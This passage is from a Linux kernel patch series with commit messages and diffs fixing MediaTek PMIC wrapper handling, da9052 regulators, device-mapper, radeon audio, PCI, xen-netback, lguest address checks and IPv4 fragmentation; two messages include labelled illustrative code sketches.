d71c11f3bd2bb0c09e3f08169f5b75dba4b800ea Mon Sep 17 00:00:00 2001 From: Sascha Hauer Date: Tue, 26 May 2015 11:37:43 +0200 Subject: [PATCH 291/872] soc: mediatek: PMIC wrap: Fix clock rate handling replace chipselect extension values based on SPI clock with hardcoded SoC specific values. The PMIC wrapper has the ability of extending the chipselects by configurable amounts of time. We configured the values based on the rate of SPI clock, but this is wrong. The delays should be configured based on the internal PMIC clock that latches the values from the SPI bus to the internal PMIC registers. By default this clock is 24MHz. Other clock frequencies are for debugging only and can be removed from the driver. Signed-off-by: Sascha Hauer Signed-off-by: Matthias Brugger --- drivers/soc/mediatek/mtk-pmic-wrap.c | 42 +++++----------------------- 1 file changed, 7 insertions(+), 35 deletions(-) diff --git a/drivers/soc/mediatek/mtk-pmic-wrap.c b/drivers/soc/mediatek/mtk-pmic-wrap.c index db5be1eec54c..642d6a1a2c43 100644 --- a/drivers/soc/mediatek/mtk-pmic-wrap.c +++ b/drivers/soc/mediatek/mtk-pmic-wrap.c @@ -563,45 +563,17 @@ static int pwrap_init_sidly(struct pmic_wrapper *wrp) static int pwrap_init_reg_clock(struct pmic_wrapper *wrp) { - unsigned long rate_spi; - int ck_mhz; - - rate_spi = clk_get_rate(wrp->clk_spi); - - if (rate_spi > 26000000) - ck_mhz = 26; - else if (rate_spi > 18000000) - ck_mhz = 18; - else - ck_mhz = 0; - - switch (ck_mhz) { - case 18: - if (pwrap_is_mt8135(wrp)) - pwrap_writel(wrp, 0xc, PWRAP_CSHEXT); - pwrap_writel(wrp, 0x4, PWRAP_CSHEXT_WRITE); - pwrap_writel(wrp, 0xc, PWRAP_CSHEXT_READ); - pwrap_writel(wrp, 0x0, PWRAP_CSLEXT_START); - pwrap_writel(wrp, 0x0, PWRAP_CSLEXT_END); - break; - case 26: - if (pwrap_is_mt8135(wrp)) - pwrap_writel(wrp, 0x4, PWRAP_CSHEXT); + if (pwrap_is_mt8135(wrp)) { + pwrap_writel(wrp, 0x4, PWRAP_CSHEXT); pwrap_writel(wrp, 0x0, PWRAP_CSHEXT_WRITE); pwrap_writel(wrp, 0x4, PWRAP_CSHEXT_READ); pwrap_writel(wrp, 0x0, PWRAP_CSLEXT_START); pwrap_writel(wrp, 0x0, PWRAP_CSLEXT_END); - break; - case 0: - if (pwrap_is_mt8135(wrp)) - pwrap_writel(wrp, 0xf, PWRAP_CSHEXT); - pwrap_writel(wrp, 0xf, PWRAP_CSHEXT_WRITE); - pwrap_writel(wrp, 0xf, PWRAP_CSHEXT_READ); - pwrap_writel(wrp, 0xf, PWRAP_CSLEXT_START); - pwrap_writel(wrp, 0xf, PWRAP_CSLEXT_END); - break; - default: - return -EINVAL; + } else { + pwrap_writel(wrp, 0x0, PWRAP_CSHEXT_WRITE); + pwrap_writel(wrp, 0x4, PWRAP_CSHEXT_READ); + pwrap_writel(wrp, 0x2, PWRAP_CSLEXT_START); + pwrap_writel(wrp, 0x2, PWRAP_CSLEXT_END); } return 0; From d956b80ac7a6ba6ee45ac46e969f68dd15b4b729 Mon Sep 17 00:00:00 2001 From: Sascha Hauer Date: Tue, 26 May 2015 11:37:44 +0200 Subject: [PATCH 292/872] soc: mediatek: PMIC wrap: Fix register state machine handling When the PMIC wrapper state machine has read a register it goes into the "wait for valid clear" (vldclr) state. The state machine stays in this state until the VLDCLR bit is written to. We should write this bit after reading a register because the SCPSYS won't let the system go into suspend as long as the state machine waits for valid clear. Since now we never leave the state machine in vldclr state we no longer have to check for this state on pwrap_read/pwrap_write entry and can remove the corresponding code. 
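For illustration, a minimal sketch of the read-then-acknowledge ordering described above. This is not the driver's code (the actual change is in the diff that follows); the register offsets, the FSM state encoding and the timeout are invented stand-ins, and only readl()/writel() are the usual kernel accessors.

#include <linux/io.h>
#include <linux/errno.h>

#define EX_WACS2_RDATA  0xa4    /* stand-in: read-data/status register */
#define EX_WACS2_VLDCLR 0xa8    /* stand-in: valid-clear register */
#define EX_FSM_WFVLDCLR 6       /* stand-in: "wait for valid clear" state */

static int example_pwrap_read(void __iomem *base, u32 *rdata)
{
        u32 val;
        int timeout = 10000;

        /* poll until the wrapper FSM reports that read data is ready */
        do {
                val = readl(base + EX_WACS2_RDATA);
                if (--timeout == 0)
                        return -ETIMEDOUT;
        } while (((val >> 16) & 0x7) != EX_FSM_WFVLDCLR);

        *rdata = val & 0xffff;

        /*
         * Acknowledge right away: writing the valid-clear bit sends the
         * FSM back to idle, so SCPSYS is never kept from entering suspend.
         */
        writel(1, base + EX_WACS2_VLDCLR);

        return 0;
}

The point of the change below is exactly this ordering: the acknowledge happens on the read path itself rather than lazily on the next read/write entry.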
Signed-off-by: Sascha Hauer Signed-off-by: Matthias Brugger --- drivers/soc/mediatek/mtk-pmic-wrap.c | 12 ++---------- 1 file changed, 2 insertions(+), 10 deletions(-) diff --git a/drivers/soc/mediatek/mtk-pmic-wrap.c b/drivers/soc/mediatek/mtk-pmic-wrap.c index 642d6a1a2c43..f432291feee9 100644 --- a/drivers/soc/mediatek/mtk-pmic-wrap.c +++ b/drivers/soc/mediatek/mtk-pmic-wrap.c @@ -443,11 +443,6 @@ static int pwrap_wait_for_state(struct pmic_wrapper *wrp, static int pwrap_write(struct pmic_wrapper *wrp, u32 adr, u32 wdata) { int ret; - u32 val; - - val = pwrap_readl(wrp, PWRAP_WACS2_RDATA); - if (PWRAP_GET_WACS_FSM(val) == PWRAP_WACS_FSM_WFVLDCLR) - pwrap_writel(wrp, 1, PWRAP_WACS2_VLDCLR); ret = pwrap_wait_for_state(wrp, pwrap_is_fsm_idle); if (ret) @@ -462,11 +457,6 @@ static int pwrap_write(struct pmic_wrapper *wrp, u32 adr, u32 wdata) static int pwrap_read(struct pmic_wrapper *wrp, u32 adr, u32 *rdata) { int ret; - u32 val; - - val = pwrap_readl(wrp, PWRAP_WACS2_RDATA); - if (PWRAP_GET_WACS_FSM(val) == PWRAP_WACS_FSM_WFVLDCLR) - pwrap_writel(wrp, 1, PWRAP_WACS2_VLDCLR); ret = pwrap_wait_for_state(wrp, pwrap_is_fsm_idle); if (ret) @@ -480,6 +470,8 @@ static int pwrap_read(struct pmic_wrapper *wrp, u32 adr, u32 *rdata) *rdata = PWRAP_GET_WACS_RDATA(pwrap_readl(wrp, PWRAP_WACS2_RDATA)); + pwrap_writel(wrp, 1, PWRAP_WACS2_VLDCLR); + return 0; } From e0c21530fa91f119bfca19640a67380c6b14f12a Mon Sep 17 00:00:00 2001 From: Johan Hovold Date: Fri, 15 May 2015 16:27:40 +0200 Subject: [PATCH 293/872] mfd: da9052: Fix broken regulator probe Fix broken probe of da9052 regulators, which since commit b3f6c73db732 ("mfd: da9052-core: Fix platform-device id collision") use a non-deterministic platform-device id to retrieve static regulator information. Fortunately, adequate error handling was in place so probe would simply fail with an error message. Update the mfd-cell ids to be zero-based and use those to identify the cells when probing the regulator devices. 
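As a hedged sketch of the lookup pattern the fix switches to (not the da9052 driver itself, whose change follows in the diff; the info table and its contents are stand-ins, while mfd_get_cell() is the MFD core helper the patch uses): the probe routine indexes its static per-regulator table with the zero-based mfd cell id instead of the no-longer-deterministic platform-device id.

#include <linux/kernel.h>
#include <linux/errno.h>
#include <linux/mfd/core.h>
#include <linux/platform_device.h>

struct example_regulator_info {
        int id;                         /* stand-in per-regulator data */
};

static struct example_regulator_info example_info[14];  /* one slot per cell */

static int example_regulator_probe(struct platform_device *pdev)
{
        /* the cell this platform device was created from by the MFD core */
        const struct mfd_cell *cell = mfd_get_cell(pdev);

        /* cell->id is zero-based and stable, unlike pdev->id */
        if (cell->id < 0 || cell->id >= (int)ARRAY_SIZE(example_info))
                return -EINVAL;

        platform_set_drvdata(pdev, &example_info[cell->id]);
        /* ... the real driver would now register the regulator ... */
        return 0;
}

Keeping the cell ids zero-based is what lets the same number double as an index into the static info table.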
Fixes: b3f6c73db732 ("mfd: da9052-core: Fix platform-device id collision") Cc: stable # v3.19 Signed-off-by: Johan Hovold Acked-by: Bartlomiej Zolnierkiewicz Reviewed-by: Mark Brown Signed-off-by: Lee Jones --- drivers/mfd/da9052-core.c | 8 ++++---- drivers/regulator/da9052-regulator.c | 5 +++-- 2 files changed, 7 insertions(+), 6 deletions(-) diff --git a/drivers/mfd/da9052-core.c b/drivers/mfd/da9052-core.c index ae498b53ee40..46e3840c7a37 100644 --- a/drivers/mfd/da9052-core.c +++ b/drivers/mfd/da9052-core.c @@ -431,6 +431,10 @@ int da9052_adc_read_temp(struct da9052 *da9052) EXPORT_SYMBOL_GPL(da9052_adc_read_temp); static const struct mfd_cell da9052_subdev_info[] = { + { + .name = "da9052-regulator", + .id = 0, + }, { .name = "da9052-regulator", .id = 1, @@ -483,10 +487,6 @@ static const struct mfd_cell da9052_subdev_info[] = { .name = "da9052-regulator", .id = 13, }, - { - .name = "da9052-regulator", - .id = 14, - }, { .name = "da9052-onkey", }, diff --git a/drivers/regulator/da9052-regulator.c b/drivers/regulator/da9052-regulator.c index 8a4df7a1f2ee..e628d4c2f2ae 100644 --- a/drivers/regulator/da9052-regulator.c +++ b/drivers/regulator/da9052-regulator.c @@ -394,6 +394,7 @@ static inline struct da9052_regulator_info *find_regulator_info(u8 chip_id, static int da9052_regulator_probe(struct platform_device *pdev) { + const struct mfd_cell *cell = mfd_get_cell(pdev); struct regulator_config config = { }; struct da9052_regulator *regulator; struct da9052 *da9052; @@ -409,7 +410,7 @@ static int da9052_regulator_probe(struct platform_device *pdev) regulator->da9052 = da9052; regulator->info = find_regulator_info(regulator->da9052->chip_id, - pdev->id); + cell->id); if (regulator->info == NULL) { dev_err(&pdev->dev, "invalid regulator ID specified\n"); return -EINVAL; @@ -419,7 +420,7 @@ static int da9052_regulator_probe(struct platform_device *pdev) config.driver_data = regulator; config.regmap = da9052->regmap; if (pdata && pdata->regulators) { - config.init_data = pdata->regulators[pdev->id]; + config.init_data = pdata->regulators[cell->id]; } else { #ifdef CONFIG_OF struct device_node *nproot = da9052->dev->of_node; From 3a1407559a593d4360af12dd2df5296bf8eb0d28 Mon Sep 17 00:00:00 2001 From: Junichi Nomura Date: Wed, 27 May 2015 04:22:07 +0000 Subject: [PATCH 294/872] dm: fix NULL pointer when clone_and_map_rq returns !DM_MAPIO_REMAPPED When stacking request-based DM on blk_mq device, request cloning and remapping are done in a single call to target's clone_and_map_rq(). The clone is allocated and valid only if clone_and_map_rq() returns DM_MAPIO_REMAPPED. The "IS_ERR(clone)" check in map_request() does not cover all the !DM_MAPIO_REMAPPED cases that are possible (E.g. if underlying devices are not ready or unavailable, clone_and_map_rq() may return DM_MAPIO_REQUEUE without ever having established an ERR_PTR). Fix this by explicitly checking for a return that is not DM_MAPIO_REMAPPED in map_request(). Without this fix, DM core may call setup_clone() for a NULL clone and oops like this: BUG: unable to handle kernel NULL pointer dereference at 0000000000000068 IP: [] blk_rq_prep_clone+0x7d/0x137 ... CPU: 2 PID: 5793 Comm: kdmwork-253:3 Not tainted 4.0.0-nm #1 ... Call Trace: [] map_tio_request+0xa9/0x258 [dm_mod] [] kthread_worker_fn+0xfd/0x150 [] ? kthread_parkme+0x24/0x24 [] ? kthread_parkme+0x24/0x24 [] kthread+0xe6/0xee [] ? put_lock_stats+0xe/0x20 [] ? __init_kthread_worker+0x5b/0x5b [] ret_from_fork+0x58/0x90 [] ? 
__init_kthread_worker+0x5b/0x5b Fixes: e5863d9ad ("dm: allocate requests in target when stacking on blk-mq devices") Reported-by: Bart Van Assche Signed-off-by: Jun'ichi Nomura Signed-off-by: Mike Snitzer Cc: stable@vger.kernel.org # 4.0+ --- drivers/md/dm.c | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/drivers/md/dm.c b/drivers/md/dm.c index 0bf79a0bad37..1c62ed8d09f4 100644 --- a/drivers/md/dm.c +++ b/drivers/md/dm.c @@ -1972,8 +1972,8 @@ static int map_request(struct dm_rq_target_io *tio, struct request *rq, dm_kill_unmapped_request(rq, r); return r; } - if (IS_ERR(clone)) - return DM_MAPIO_REQUEUE; + if (r != DM_MAPIO_REMAPPED) + return r; if (setup_clone(clone, rq, tio, GFP_ATOMIC)) { /* -ENOMEM */ ti->type->release_clone_rq(clone); From 0fa372b6c95013af1334b3d5c9b5f03a70ecedab Mon Sep 17 00:00:00 2001 From: Takashi Iwai Date: Wed, 27 May 2015 16:17:19 +0200 Subject: [PATCH 295/872] ALSA: hda - Fix noise on AMD radeon 290x controller A new AMD controller [1002:aac8] seems to need the quirk for other AMD NS HDMI stuff, otherwise it gives noisy sounds. Bugzilla: https://bugzilla.kernel.org/show_bug.cgi?id=99021 Cc: Signed-off-by: Takashi Iwai --- sound/pci/hda/hda_intel.c | 2 ++ 1 file changed, 2 insertions(+) diff --git a/sound/pci/hda/hda_intel.c b/sound/pci/hda/hda_intel.c index 34040d26c94f..fea198c58196 100644 --- a/sound/pci/hda/hda_intel.c +++ b/sound/pci/hda/hda_intel.c @@ -2089,6 +2089,8 @@ static const struct pci_device_id azx_ids[] = { .driver_data = AZX_DRIVER_ATIHDMI_NS | AZX_DCAPS_PRESET_ATI_HDMI_NS }, { PCI_DEVICE(0x1002, 0xaab0), .driver_data = AZX_DRIVER_ATIHDMI_NS | AZX_DCAPS_PRESET_ATI_HDMI_NS }, + { PCI_DEVICE(0x1002, 0xaac8), + .driver_data = AZX_DRIVER_ATIHDMI_NS | AZX_DCAPS_PRESET_ATI_HDMI_NS }, /* VIA VT8251/VT8237A */ { PCI_DEVICE(0x1106, 0x3288), .driver_data = AZX_DRIVER_VIA | AZX_DCAPS_POSFIX_VIA }, From 2a910d139e405f1038c0f2ea7f9ac45acc84cce9 Mon Sep 17 00:00:00 2001 From: Matthias Brugger Date: Wed, 27 May 2015 14:20:55 +0200 Subject: [PATCH 296/872] soc: mediatek: Add compile dependency to pmic-wrapper MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit The pmic-wrapper calls the reset controller. If CONFIG_RESET_CONTROLLER is not set, compilation fails with: drivers/soc/mediatek/mtk-pmic-wrap.c: In function ‘pwrap_probe’: drivers/soc/mediatek/mtk-pmic-wrap.c:836:2: error: implicit declaration of function ‘devm_reset_control_get’ [-Werror=implicit-function-declaration] This patch sets the dependency in the Kconfig file. Signed-off-by: Matthias Brugger --- drivers/soc/mediatek/Kconfig | 1 + 1 file changed, 1 insertion(+) diff --git a/drivers/soc/mediatek/Kconfig b/drivers/soc/mediatek/Kconfig index bcdb22d5e215..3c1850332a90 100644 --- a/drivers/soc/mediatek/Kconfig +++ b/drivers/soc/mediatek/Kconfig @@ -4,6 +4,7 @@ config MTK_PMIC_WRAP tristate "MediaTek PMIC Wrapper Support" depends on ARCH_MEDIATEK + depends on RESET_CONTROLLER select REGMAP help Say yes here to add support for MediaTek PMIC Wrapper found From 2d1c18bba15daf89d75ce475ecd2068f483aa12f Mon Sep 17 00:00:00 2001 From: Alex Deucher Date: Wed, 27 May 2015 11:43:53 -0400 Subject: [PATCH 297/872] Revert "drm/radeon: only mark audio as connected if the monitor supports it (v3)" This breaks too many things. bugs: https://bugzilla.kernel.org/show_bug.cgi?id=99041 https://bugs.freedesktop.org/show_bug.cgi?id=90681 This reverts commit 0f55db36d49d45b80eff0c0a2a498766016f458b. 
Cc: stable@vger.kernel.org --- drivers/gpu/drm/radeon/radeon_audio.c | 27 ++++++++++------------ drivers/gpu/drm/radeon/radeon_connectors.c | 8 ++----- 2 files changed, 14 insertions(+), 21 deletions(-) diff --git a/drivers/gpu/drm/radeon/radeon_audio.c b/drivers/gpu/drm/radeon/radeon_audio.c index dcb779647c57..25191f126f3b 100644 --- a/drivers/gpu/drm/radeon/radeon_audio.c +++ b/drivers/gpu/drm/radeon/radeon_audio.c @@ -460,9 +460,6 @@ void radeon_audio_detect(struct drm_connector *connector, if (!connector || !connector->encoder) return; - if (!radeon_encoder_is_digital(connector->encoder)) - return; - rdev = connector->encoder->dev->dev_private; if (!radeon_audio_chipset_supported(rdev)) @@ -471,26 +468,26 @@ void radeon_audio_detect(struct drm_connector *connector, radeon_encoder = to_radeon_encoder(connector->encoder); dig = radeon_encoder->enc_priv; - if (!dig->afmt) - return; - if (status == connector_status_connected) { - struct radeon_connector *radeon_connector = to_radeon_connector(connector); + struct radeon_connector *radeon_connector; + int sink_type; + + if (!drm_detect_monitor_audio(radeon_connector_edid(connector))) { + radeon_encoder->audio = NULL; + return; + } + + radeon_connector = to_radeon_connector(connector); + sink_type = radeon_dp_getsinktype(radeon_connector); if (connector->connector_type == DRM_MODE_CONNECTOR_DisplayPort && - radeon_dp_getsinktype(radeon_connector) == - CONNECTOR_OBJECT_ID_DISPLAYPORT) + sink_type == CONNECTOR_OBJECT_ID_DISPLAYPORT) radeon_encoder->audio = rdev->audio.dp_funcs; else radeon_encoder->audio = rdev->audio.hdmi_funcs; dig->afmt->pin = radeon_audio_get_pin(connector->encoder); - if (drm_detect_monitor_audio(radeon_connector_edid(connector))) { - radeon_audio_enable(rdev, dig->afmt->pin, 0xf); - } else { - radeon_audio_enable(rdev, dig->afmt->pin, 0); - dig->afmt->pin = NULL; - } + radeon_audio_enable(rdev, dig->afmt->pin, 0xf); } else { radeon_audio_enable(rdev, dig->afmt->pin, 0); dig->afmt->pin = NULL; diff --git a/drivers/gpu/drm/radeon/radeon_connectors.c b/drivers/gpu/drm/radeon/radeon_connectors.c index d17d251dbd4f..cebb65e07e1d 100644 --- a/drivers/gpu/drm/radeon/radeon_connectors.c +++ b/drivers/gpu/drm/radeon/radeon_connectors.c @@ -1379,10 +1379,8 @@ radeon_dvi_detect(struct drm_connector *connector, bool force) /* updated in get modes as well since we need to know if it's analog or digital */ radeon_connector_update_scratch_regs(connector, ret); - if (radeon_audio != 0) { - radeon_connector_get_edid(connector); + if (radeon_audio != 0) radeon_audio_detect(connector, ret); - } exit: pm_runtime_mark_last_busy(connector->dev->dev); @@ -1719,10 +1717,8 @@ radeon_dp_detect(struct drm_connector *connector, bool force) radeon_connector_update_scratch_regs(connector, ret); - if (radeon_audio != 0) { - radeon_connector_get_edid(connector); + if (radeon_audio != 0) radeon_audio_detect(connector, ret); - } out: pm_runtime_mark_last_busy(connector->dev->dev); From a6b65983dabceb7ccb1801ee7f5bd421c2704d16 Mon Sep 17 00:00:00 2001 From: Wei Yang Date: Tue, 19 May 2015 14:24:17 +0800 Subject: [PATCH 298/872] PCI: Fix IOV resource sorting by alignment requirement In d74b9027a4da ("PCI: Consider additional PF's IOV BAR alignment in sizing and assigning"), it stores additional alignment in realloc_head and takes this into consideration for assignment. After getting the additional alignment, it reorders the head list so resources with bigger alignment are ahead of resources with smaller alignment. 
It does this by iterating over the head list and inserting ahead of any resource with smaller alignment. This should be done for the first occurrence, but the code currently iterates over the whole list. Fix this by terminating the loop when we find the first smaller resource in the head list. [bhelgaas: changelog] Fixes: d74b9027a4da ("PCI: Consider additional PF's IOV BAR alignment in sizing and assigning") Signed-off-by: Wei Yang Signed-off-by: Bjorn Helgaas --- drivers/pci/setup-bus.c | 4 +++- 1 file changed, 3 insertions(+), 1 deletion(-) diff --git a/drivers/pci/setup-bus.c b/drivers/pci/setup-bus.c index 4fd0cacf7ca0..aa281d909eb0 100644 --- a/drivers/pci/setup-bus.c +++ b/drivers/pci/setup-bus.c @@ -435,9 +435,11 @@ static void __assign_resources_sorted(struct list_head *head, list_for_each_entry(dev_res2, head, list) { align = pci_resource_alignment(dev_res2->dev, dev_res2->res); - if (add_align > align) + if (add_align > align) { list_move_tail(&dev_res->list, &dev_res2->list); + break; + } } } From ce0e5c522d3924090c20e774359809a7aa08c44c Mon Sep 17 00:00:00 2001 From: Ross Lagerwall Date: Wed, 27 May 2015 11:44:32 +0100 Subject: [PATCH 299/872] xen/netback: Properly initialize credit_bytes Commit e9ce7cb6b107 ("xen-netback: Factor queue-specific data into queue struct") introduced a regression when moving queue-specific data into the queue struct by failing to set the credit_bytes field. This prevented bandwidth limiting from working. Initialize the field as it was done before multiqueue support was added. Signed-off-by: Ross Lagerwall Acked-by: Wei Liu Signed-off-by: David S. Miller --- drivers/net/xen-netback/xenbus.c | 1 + 1 file changed, 1 insertion(+) diff --git a/drivers/net/xen-netback/xenbus.c b/drivers/net/xen-netback/xenbus.c index 3d8dbf5f2d39..fee02414529e 100644 --- a/drivers/net/xen-netback/xenbus.c +++ b/drivers/net/xen-netback/xenbus.c @@ -793,6 +793,7 @@ static void connect(struct backend_info *be) goto err; } + queue->credit_bytes = credit_bytes; queue->remaining_credit = credit_bytes; queue->credit_usec = credit_usec; From 83a35114d0e4583e6b0ca39502e68b6a92e2910c Mon Sep 17 00:00:00 2001 From: Rusty Russell Date: Wed, 27 May 2015 10:59:26 +0930 Subject: [PATCH 300/872] lguest: fix out-by-one error in address checking. This bug has been there since day 1; addresses in the top guest physical page weren't considered valid. You could map that page (the check in check_gpte() is correct), but if a guest tried to put a pagetable there we'd check that address manually when walking it, and kill the guest. Signed-off-by: Rusty Russell Cc: stable@kernel.org Signed-off-by: Linus Torvalds --- drivers/lguest/core.c | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/drivers/lguest/core.c b/drivers/lguest/core.c index 7dc93aa004c8..312ffd3d0017 100644 --- a/drivers/lguest/core.c +++ b/drivers/lguest/core.c @@ -173,7 +173,7 @@ static void unmap_switcher(void) bool lguest_address_ok(const struct lguest *lg, unsigned long addr, unsigned long len) { - return (addr+len) / PAGE_SIZE < lg->pfn_limit && (addr+len >= addr); + return addr+len <= lg->pfn_limit * PAGE_SIZE && (addr+len >= addr); } /* From c5501eb3406d0f88b3efb2c437c4c40b35f865d8 Mon Sep 17 00:00:00 2001 From: Florian Westphal Date: Fri, 22 May 2015 16:32:50 +0200 Subject: [PATCH 301/872] net: ipv4: avoid repeated calls to ip_skb_dst_mtu helper ip_skb_dst_mtu is a small inline helper, but it's called in several places.
before: 17061 44 0 17105 42d1 net/ipv4/ip_output.o after: 16805 44 0 16849 41d1 net/ipv4/ip_output.o Signed-off-by: Florian Westphal Acked-by: Hannes Frederic Sowa Signed-off-by: David S. Miller --- net/ipv4/ip_output.c | 19 ++++++++++++------- 1 file changed, 12 insertions(+), 7 deletions(-) diff --git a/net/ipv4/ip_output.c b/net/ipv4/ip_output.c index 451b009dae75..d6dd8ba04441 100644 --- a/net/ipv4/ip_output.c +++ b/net/ipv4/ip_output.c @@ -84,6 +84,7 @@ int sysctl_ip_default_ttl __read_mostly = IPDEFTTL; EXPORT_SYMBOL(sysctl_ip_default_ttl); static int ip_fragment(struct sock *sk, struct sk_buff *skb, + unsigned int mtu, int (*output)(struct sock *, struct sk_buff *)); /* Generate a checksum for an outgoing IP datagram. */ @@ -219,7 +220,8 @@ static inline int ip_finish_output2(struct sock *sk, struct sk_buff *skb) return -EINVAL; } -static int ip_finish_output_gso(struct sock *sk, struct sk_buff *skb) +static int ip_finish_output_gso(struct sock *sk, struct sk_buff *skb, + unsigned int mtu) { netdev_features_t features; struct sk_buff *segs; @@ -227,7 +229,7 @@ static int ip_finish_output_gso(struct sock *sk, struct sk_buff *skb) /* common case: locally created skb or seglen is <= mtu */ if (((IPCB(skb)->flags & IPSKB_FORWARDED) == 0) || - skb_gso_network_seglen(skb) <= ip_skb_dst_mtu(skb)) + skb_gso_network_seglen(skb) <= mtu) return ip_finish_output2(sk, skb); /* Slowpath - GSO segment length is exceeding the dst MTU. @@ -251,7 +253,7 @@ static int ip_finish_output_gso(struct sock *sk, struct sk_buff *skb) int err; segs->next = NULL; - err = ip_fragment(sk, segs, ip_finish_output2); + err = ip_fragment(sk, segs, mtu, ip_finish_output2); if (err && ret == 0) ret = err; @@ -263,6 +265,8 @@ static int ip_finish_output_gso(struct sock *sk, struct sk_buff *skb) static int ip_finish_output(struct sock *sk, struct sk_buff *skb) { + unsigned int mtu; + #if defined(CONFIG_NETFILTER) && defined(CONFIG_XFRM) /* Policy lookup after SNAT yielded a new policy */ if (skb_dst(skb)->xfrm) { @@ -270,11 +274,12 @@ static int ip_finish_output(struct sock *sk, struct sk_buff *skb) return dst_output_sk(sk, skb); } #endif + mtu = ip_skb_dst_mtu(skb); if (skb_is_gso(skb)) - return ip_finish_output_gso(sk, skb); + return ip_finish_output_gso(sk, skb, mtu); - if (skb->len > ip_skb_dst_mtu(skb)) - return ip_fragment(sk, skb, ip_finish_output2); + if (skb->len > mtu) + return ip_fragment(sk, skb, mtu, ip_finish_output2); return ip_finish_output2(sk, skb); } @@ -482,10 +487,10 @@ static void ip_copy_metadata(struct sk_buff *to, struct sk_buff *from) } static int ip_fragment(struct sock *sk, struct sk_buff *skb, + unsigned int mtu, int (*output)(struct sock *, struct sk_buff *)) { struct iphdr *iph = ip_hdr(skb); - unsigned int mtu = ip_skb_dst_mtu(skb); if (unlikely(((iph->frag_off & htons(IP_DF)) && !skb->ignore_df) || (IPCB(skb)->frag_max_size && From d6b915e29f4adea94bc02ba7675bb4f84e6a1abd Mon Sep 17 00:00:00 2001 From: Florian Westphal Date: Fri, 22 May 2015 16:32:51 +0200 Subject: [PATCH 302/872] ip_fragment: don't forward defragmented DF packet We currently always send fragments without DF bit set. Thus, given following setup: mtu1500 - mtu1500:1400 - mtu1400:1280 - mtu1280 A R1 R2 B Where R1 and R2 run linux with netfilter defragmentation/conntrack enabled, then if Host A sent a fragmented packet _with_ DF set to B, R1 will respond with icmp too big error if one of these fragments exceeded 1400 bytes. 
However, if R1 receives fragment sizes 1200 and 100, it would forward the reassembled packet without refragmenting, i.e. R2 will send an icmp error in response to a packet that was never sent, citing mtu that the original sender never exceeded. The other minor issue is that a refragmentation on R1 will conceal the MTU of R2-B since refragmentation does not set DF bit on the fragments. This modifies ip_fragment so that we track largest fragment size seen both for DF and non-DF packets, and set frag_max_size to the largest value. If the DF fragment size is larger or equal to the non-df one, we will consider the packet a path mtu probe: We set DF bit on the reassembled skb and also tag it with a new IPCB flag to force refragmentation even if skb fits outdev mtu. We will also set DF bit on each fragment in this case. Joint work with Hannes Frederic Sowa. Reported-by: Jesse Gross Signed-off-by: Florian Westphal Acked-by: Hannes Frederic Sowa Signed-off-by: David S. Miller --- include/net/inet_frag.h | 2 +- include/net/ip.h | 1 + net/ipv4/ip_fragment.c | 31 ++++++++++++++++++++++++++----- net/ipv4/ip_output.c | 12 ++++++++++-- 4 files changed, 38 insertions(+), 8 deletions(-) diff --git a/include/net/inet_frag.h b/include/net/inet_frag.h index 8d1765577acc..e1300b3dd597 100644 --- a/include/net/inet_frag.h +++ b/include/net/inet_frag.h @@ -43,7 +43,7 @@ enum { * @len: total length of the original datagram * @meat: length of received fragments so far * @flags: fragment queue flags - * @max_size: (ipv4 only) maximum received fragment size with IP_DF set + * @max_size: maximum received fragment size * @net: namespace that this frag belongs to */ struct inet_frag_queue { diff --git a/include/net/ip.h b/include/net/ip.h index 7921a36b805c..9b976cf99122 100644 --- a/include/net/ip.h +++ b/include/net/ip.h @@ -45,6 +45,7 @@ struct inet_skb_parm { #define IPSKB_FRAG_COMPLETE BIT(3) #define IPSKB_REROUTED BIT(4) #define IPSKB_DOREDIRECT BIT(5) +#define IPSKB_FRAG_PMTU BIT(6) u16 frag_max_size; }; diff --git a/net/ipv4/ip_fragment.c b/net/ipv4/ip_fragment.c index 47fa64ee82b1..a50dc6d408d1 100644 --- a/net/ipv4/ip_fragment.c +++ b/net/ipv4/ip_fragment.c @@ -75,6 +75,7 @@ struct ipq { __be16 id; u8 protocol; u8 ecn; /* RFC3168 support */ + u16 max_df_size; /* largest frag with DF set seen */ int iif; unsigned int rid; struct inet_peer *peer; @@ -326,6 +327,7 @@ static int ip_frag_queue(struct ipq *qp, struct sk_buff *skb) { struct sk_buff *prev, *next; struct net_device *dev; + unsigned int fragsize; int flags, offset; int ihl, end; int err = -ENOENT; @@ -481,9 +483,14 @@ static int ip_frag_queue(struct ipq *qp, struct sk_buff *skb) if (offset == 0) qp->q.flags |= INET_FRAG_FIRST_IN; + fragsize = skb->len + ihl; + + if (fragsize > qp->q.max_size) + qp->q.max_size = fragsize; + if (ip_hdr(skb)->frag_off & htons(IP_DF) && - skb->len + ihl > qp->q.max_size) - qp->q.max_size = skb->len + ihl; + fragsize > qp->max_df_size) + qp->max_df_size = fragsize; if (qp->q.flags == (INET_FRAG_FIRST_IN | INET_FRAG_LAST_IN) && qp->q.meat == qp->q.len) { @@ -613,13 +620,27 @@ static int ip_frag_reasm(struct ipq *qp, struct sk_buff *prev, head->next = NULL; head->dev = dev; head->tstamp = qp->q.stamp; - IPCB(head)->frag_max_size = qp->q.max_size; + IPCB(head)->frag_max_size = max(qp->max_df_size, qp->q.max_size); iph = ip_hdr(head); - /* max_size != 0 implies at least one fragment had IP_DF set */ - iph->frag_off = qp->q.max_size ? 
htons(IP_DF) : 0; iph->tot_len = htons(len); iph->tos |= ecn; + + /* When we set IP_DF on a refragmented skb we must also force a + * call to ip_fragment to avoid forwarding a DF-skb of size s while + * original sender only sent fragments of size f (where f < s). + * + * We only set DF/IPSKB_FRAG_PMTU if such DF fragment was the largest + * frag seen to avoid sending tiny DF-fragments in case skb was built + * from one very small df-fragment and one large non-df frag. + */ + if (qp->max_df_size == qp->q.max_size) { + IPCB(head)->flags |= IPSKB_FRAG_PMTU; + iph->frag_off = htons(IP_DF); + } else { + iph->frag_off = 0; + } + IP_INC_STATS_BH(net, IPSTATS_MIB_REASMOKS); qp->q.fragments = NULL; qp->q.fragments_tail = NULL; diff --git a/net/ipv4/ip_output.c b/net/ipv4/ip_output.c index d6dd8ba04441..f5f5ef1cebd5 100644 --- a/net/ipv4/ip_output.c +++ b/net/ipv4/ip_output.c @@ -278,7 +278,7 @@ static int ip_finish_output(struct sock *sk, struct sk_buff *skb) if (skb_is_gso(skb)) return ip_finish_output_gso(sk, skb, mtu); - if 